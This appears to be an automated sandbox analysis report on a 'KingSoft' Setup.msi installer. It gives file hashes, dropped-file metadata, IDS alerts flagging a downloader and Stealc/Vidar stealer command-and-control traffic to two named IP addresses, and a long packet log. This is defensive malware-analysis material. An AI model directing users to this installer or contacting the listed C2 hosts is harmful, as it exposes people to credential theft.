                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2550762963539281
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TkduBNvcFXOxT5ypjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:IdDsTgkB9eRCtc
                                                                                                                                                                                                                                                  MD5:19C806CA065165AD2CF5EB453B704CEA
                                                                                                                                                                                                                                                  SHA1:3B0F0955F39C306A69F9AE428B805F44E3AAD649
                                                                                                                                                                                                                                                  SHA-256:74F50D7983617DDD0155719199DBE474A72FC31A092713CE748EB95DC1350E63
                                                                                                                                                                                                                                                  SHA-512:E3D1437627F41B0F6608353AA7DDD4111A691548676007FA9E7B592D4C19733259EE4C5903349331B543CA3EB582B585C8F1D22BFA0E5C6B34DC3D4DDF37DE2E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2550762963539281
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TkduBNvcFXOxT5ypjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:IdDsTgkB9eRCtc
                                                                                                                                                                                                                                                  MD5:19C806CA065165AD2CF5EB453B704CEA
                                                                                                                                                                                                                                                  SHA1:3B0F0955F39C306A69F9AE428B805F44E3AAD649
                                                                                                                                                                                                                                                  SHA-256:74F50D7983617DDD0155719199DBE474A72FC31A092713CE748EB95DC1350E63
                                                                                                                                                                                                                                                  SHA-512:E3D1437627F41B0F6608353AA7DDD4111A691548676007FA9E7B592D4C19733259EE4C5903349331B543CA3EB582B585C8F1D22BFA0E5C6B34DC3D4DDF37DE2E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5672085462326921
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ip8PhluRc06WXOCnT5qpjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:Zhl1UnTokB9eRCtc
                                                                                                                                                                                                                                                  MD5:5CD2483213F16780FDB3A23002212936
                                                                                                                                                                                                                                                  SHA1:1AC6FE4A96210B59447C9B464D267120F524CFEE
                                                                                                                                                                                                                                                  SHA-256:CFF26BB450F19D827446A922CA07C74D4DB66D514580FD185A7D73C3D8359647
                                                                                                                                                                                                                                                  SHA-512:191F98856CDE86CE2B0A6E9A5E71EDAEF4E598861D1B09B9B152697AF57590327F1DAF9EA4E8BFDC55FF001C91AE4C9223CEEDFB4AEAECDECDD22589EE4C0BB9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2877)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):2882
                                                                                                                                                                                                                                                  Entropy (8bit):5.848446699047363
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TxGpZKlgZ01LPcH6666oiknxMWl0BbHUl0t2n/cvMyL0nF0jBLAcuSEqmfQfffo:QpolilH6666/knxj0Hu0t2/cvMyOFeBc
                                                                                                                                                                                                                                                  MD5:5BB8327A4AB59F030CD96D153A5F65E4
                                                                                                                                                                                                                                                  SHA1:B54B016EE7BD2D39BFEE01B588CA6840EE59FD54
                                                                                                                                                                                                                                                  SHA-256:DD2B34EF5E6FD7705E01B7ADDEE295643920EF9A35D761EDAAA8DF5BA09F0921
                                                                                                                                                                                                                                                  SHA-512:53CEC836BA1DE0AF6613FC146B3C042B47FAB84716D581F18F5BD0D5B7B07A682E1E93B02209B4FAD071B27F1931AE249EF5BE6A6FEA0F5298F2901131B9AC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:)]}'.["",["james gunn superman teaser","federal reserve interest rate cuts","indiana user great circle","pga tour showdown","tornado warning california scotts valley","nvidia stock","movie trailers","spacex falcon 9 rocket launch"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):132739
                                                                                                                                                                                                                                                  Entropy (8bit):5.436740311922012
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:fVkJQ7O4N5dTm+syHEt4W3XdQ4Q6QuSr/nUW2i6o:fkQ7HTt/sHdQ4Q6QDfUW8o
                                                                                                                                                                                                                                                  MD5:43F099A582AE0F93DFE1B05E01908210
                                                                                                                                                                                                                                                  SHA1:3F2716DA2BF4225D574995FD23B07605152A70C6
                                                                                                                                                                                                                                                  SHA-256:16BB032508AA4537E3B7804C930ACFFA312A81C85C23378B4D979CBAC2E2CEBE
                                                                                                                                                                                                                                                  SHA-512:705A5F2EF20790675814218CA75CD5F9618B6F7189D83FA5D0D31119F20EA72274724EAF79BCB6813D35CDF5A87715BCFC1786E4689A24EB1EA28A2371F8DD59
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {2FA3CD4B-28FE-4C2B-80E4-DCE280079806}, Number of Words: 2, Subject: KingSoft, Author: SoftPortable, Name of Creating Application: KingSoft, Template: ;1033, Comments: This installer database contains the logic and data required to install KingSoft., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:53:38 2024, Last Saved Time/Date: Mon Dec 16 18:53:38 2024, Last Printed: Mon Dec 16 18:53:38 2024, Number of Pages: 450
                                                                                                                                                                                                                                                  Entropy (8bit):6.635963694120387
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                                                                                                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                                                                                                                                  File name:Setup.msi
                                                                                                                                                                                                                                                  File size:2'098'688 bytes
                                                                                                                                                                                                                                                  MD5:c1d7c466cf70f32ce2fd51609ea97fab
                                                                                                                                                                                                                                                  SHA1:d7fa0337f01755188d74e1ca17d9da89d36572da
                                                                                                                                                                                                                                                  SHA256:d10e2be559191ccef09f8b31c946fe09840f4c60374d44f6672663c53ba1431a
                                                                                                                                                                                                                                                  SHA512:36eb43516222c9264f7f6f5d6a3a40fbc879a277c42fb8281dcf7d810192a5087a441b6b107bf9f2410ff9f19dbb68ebc4ca06125fea67adfedba1fccb7367ed
                                                                                                                                                                                                                                                  SSDEEP:49152:ESmM8cU7Y4zG/knHeVdOEod5+1d7csiG/C:p4eYHeVdPod57
                                                                                                                                                                                                                                                  TLSH:25A5AE11B3CAC236E16E01BBE829EE0AE139BD63033081D763E6755E1E718C1577EB52
                                                                                                                                                                                                                                                  Icon Hash:2d2e3797b32b2b99
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T17:28:33.734481+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49738 | 138.124.60.133 | 80 | TCP
2024-12-17T17:29:14.293340+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.4 | 49785 | 116.203.12.114 | 443 | TCP
2024-12-17T17:29:14.293539+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.12.114 | 443 | 192.168.2.4 | 49785 | TCP
2024-12-17T17:29:16.597803+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.12.114 | 443 | 192.168.2.4 | 49791 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.930870056 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.930912018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.930953026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939310074 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939393997 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939419031 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939454079 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947659016 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947702885 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947741032 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947762012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.955951929 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.955995083 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.956151962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.956151962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964394093 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964473009 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964488983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964541912 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972825050 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972876072 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972942114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972994089 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981178999 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981237888 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981267929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981317997 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.989542961 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.989643097 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.989759922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.997910976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.997977018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.998018980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.998045921 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.005445004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.005604029 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.058501005 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.058542013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.058670044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.062230110 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.062313080 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124823093 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124907017 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124948025 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124982119 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127068043 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127171040 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127933025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127990961 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.128022909 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.128068924 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132795095 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132868052 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132893085 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132939100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.137885094 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.137994051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.138117075 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.138211012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.142499924 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.142514944 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.142615080 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147037983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147097111 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147146940 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147181034 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153114080 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153207064 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153343916 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153395891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156668901 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156739950 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156896114 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156949043 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.161413908 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.161444902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.161559105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166193962 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166243076 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166273117 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166311026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170742035 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170814037 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170819044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170850992 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175473928 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175550938 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175586939 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175633907 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.180248976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374380112 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374449968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374494076 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.374538898 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377087116 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377152920 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377207041 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.377249002 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379812956 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379870892 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379913092 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.379951000 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382595062 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382649899 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382656097 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.382687092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385350943 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385404110 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385437012 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.385479927 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388010979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388062000 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388144016 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.388189077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390620947 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390674114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390713930 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.390753984 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393296003 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393351078 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393373013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.393409967 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.447724104 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.447743893 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.447803020 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.448988914 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.449045897 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.449084044 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.449125051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451023102 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451078892 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451133013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.451172113 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.453684092 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.453715086 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.453744888 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.454029083 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.456422091 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.456435919 CET8049738138.124.60.133192.168.2.4
